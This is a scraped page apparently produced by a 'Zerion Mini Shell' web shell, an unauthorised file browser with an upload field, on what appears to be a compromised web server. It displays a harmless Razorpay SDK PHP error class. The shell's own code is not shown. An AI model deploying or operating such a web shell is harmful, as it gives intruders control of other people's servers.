ok

Mini Shell

Direktori : /home2/selectio/public_html/fms-worksuite/vendor/razorpay/razorpay/src/Errors/
Upload File :
Current File : /home2/selectio/public_html/fms-worksuite/vendor/razorpay/razorpay/src/Errors/BadRequestError.php

<?php

namespace Razorpay\Api\Errors;

class BadRequestError extends Error
{
    protected $field = null;

    public function __construct($message, $code, $httpStatusCode, $field = null)
    {
        parent::__construct($message, $code, $httpStatusCode);

        $this->field = $field;
    }

    public function getField()
    {
        return $this->field;
    }
}

Zerion Mini Shell 1.0